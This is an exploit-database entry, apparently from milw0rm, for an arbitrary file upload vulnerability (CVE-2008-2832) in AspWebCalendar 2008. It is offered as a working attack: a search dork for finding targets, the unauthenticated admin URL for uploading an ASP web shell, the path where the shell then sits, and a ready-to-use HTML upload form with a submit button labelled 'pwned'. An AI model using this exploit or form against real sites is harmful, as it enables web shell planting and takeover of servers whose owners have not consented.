[] NeoSense
E X P L O I T S
title author type platform port cve id

AspWebCalendar 2008 - Arbitrary File Upload

Author: Alemin_Krali
type: webapps
platform: asp
port: 
date_added: 2008-06-17 
date_updated: 2016-12-08 
verified: 1 
codes: OSVDB-46642;CVE-2008-2832 
tags: 
aliases:  
screenshot_url:  
application_url: 
Title:AspWebCalendar 2008 Remote File Upload Vulnerability

# Discovered by : Alemin_Krali

# Dork :calendar.asp?eventdetail

http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell

http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address

upload form

<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P>


Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed

# milw0rm.com [2008-06-18]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.